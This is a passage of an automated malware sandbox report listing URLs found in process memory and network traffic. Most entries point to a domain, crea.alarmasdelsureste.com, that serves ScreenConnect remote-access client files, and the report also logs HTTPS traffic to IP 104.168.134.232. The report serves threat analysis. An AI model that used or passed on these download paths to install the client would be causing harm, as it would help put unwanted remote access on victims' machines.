                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A2E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140BC3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crea.alarmasdelsureste.com
                  Source: svchost.exe, 00000005.00000002.2939687826.000001DEBFA00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.2524797376.0000025140209000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2538222020.000002515A5E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?9f6ccd2
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/envj
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFC4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: dfsvc.exe, 00000001.00000002.2524053216.000002513E664000.00000004.00000020.00020000.00000000.sdmp, C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.2524053216.000002513E664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7Nfjgt
                  Source: dfsvc.exe, 00000001.00000002.2538376669.000002515A604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.2538376669.000002515A604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: dfsvc.exe, 00000001.00000002.2525404173.00000251403DA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2940994575.0000000001EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.2525404173.00000251406A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140834000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514089A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.2525404173.000002514044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.2525404173.000002514044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2137356260.000000001B8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdels
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2135090486.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsu
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsur
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140639000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A2E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140616000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2137809049.000000001B904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/S2
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140A2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.C
                  Source: Support.Client.exe, 00000000.00000002.2002795893.000000000096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2136661516.000000001B830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2137251432.000000001B874000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2137657698.000000001B8CE000.00000004.00000020.00020000.00000000.sdmp, OX50X7XC.log.1.drString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.
                  Source: dfsvc.exe, 00000001.00000002.2543292743.000002515BFB4000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2136661516.000000001B830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application%
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application2
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application2j
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application8j
                  Source: OX50X7XC.log.1.drString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=0bd0.adr
                  Source: dfsvc.exe, 00000001.00000002.2524053216.000002513E664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationDv
                  Source: dfsvc.exe, 00000001.00000002.2542470571.000002515BEF3000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationX
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2136661516.000000001B830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationcd
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationestl
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2137356260.000000001B898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationgod&
                  Source: dfsvc.exe, 00000001.00000002.2525404173.00000251406A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationx
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationxm
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140A2E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.dll
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, OX50X7XC.log.1.drString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.2524797376.000002514022D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.manifestC
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientSer8
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.2525404173.00000251405BB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Core.dllcw
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Windows.dllPt
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsBackstageSx
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsCl8
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2538222020.000002515A5E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe.configJ
                  Source: dfsvc.exe, 00000001.00000002.2538222020.000002515A5E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe.configW
                  Source: dfsvc.exe, 00000001.00000002.2542470571.000002515BEF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exeR
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exex
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileMa
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.ex
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2538222020.000002515A5E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exe.configT
                  Source: dfsvc.exe, 00000001.00000002.2542470571.000002515BEF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exeD
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                  Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFCC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFCC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                  Source: edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                  Source: unknownHTTPS traffic detected: 104.168.134.232:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.168.134.232:443 -> 192.168.2.4:49748 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                  Spam, unwanted Advertisements and Ransom Demands

